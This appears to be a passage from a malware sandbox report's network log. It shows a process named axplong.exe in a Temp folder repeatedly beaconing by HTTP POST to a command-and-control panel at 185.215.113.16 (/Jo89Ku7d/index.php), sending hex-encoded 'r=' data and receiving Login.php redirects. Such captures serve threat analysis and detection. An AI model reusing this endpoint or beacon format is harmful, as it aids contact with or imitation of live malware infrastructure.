                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:38.133568048 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    31192.168.2.462790185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:38.253225088 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:38.944102049 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:38 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:38.944865942 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:39.169862032 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    32192.168.2.462791185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:39.280857086 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:39.982755899 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:39 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:39.983638048 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:40.462874889 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:40 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    33192.168.2.462792185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:40.578200102 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:41.473840952 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:41.475071907 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:41.698685884 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:41 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    34192.168.2.462793185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:41.812711000 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:42.527532101 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:42.529194117 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:42.753321886 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:42 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    35192.168.2.462794185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:42.874540091 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:43.610168934 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:43.610893011 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:43.850919962 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:43 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    36192.168.2.462795185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:43.968508959 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:44.759453058 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:44.760080099 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:44.989880085 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:44 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    37192.168.2.462796185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:45.111076117 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:45.839206934 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:45.841726065 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:46.076545954 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:45 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    38192.168.2.462797185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:46.238616943 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:46.949131012 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:46 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:46.949901104 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:47.230307102 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:47 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    39192.168.2.462798185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:47.343358994 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:48.145020008 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:48.146502018 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:48.478024006 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:48 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    40192.168.2.462799185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:48.595351934 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:49.380398035 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:49.381222963 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                                                                    Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                                                                    Sep 27, 2024 19:05:49.619226933 CEST196INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:49 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 7 <c><d>0


                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                    41192.168.2.462800185.215.113.16802672C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                                                                    TimestampBytes transferredDirectionData
                                                                    Sep 27, 2024 19:05:49.734205961 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 4
                                                                    Cache-Control: no-cache
                                                                    Data Raw: 73 74 3d 73
                                                                    Data Ascii: st=s
                                                                    Sep 27, 2024 19:05:50.444812059 CEST219INHTTP/1.1 200 OK
                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                    Date: Fri, 27 Sep 2024 17:05:50 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Transfer-Encoding: chunked
                                                                    Connection: keep-alive
                                                                    Refresh: 0; url = Login.php
                                                                    Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                    Data Ascii: 1 0
                                                                    Sep 27, 2024 19:05:50.445610046 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    Host: 185.215.113.16
                                                                    Content-Length: 154
                                                                    Cache-Control: no-cache
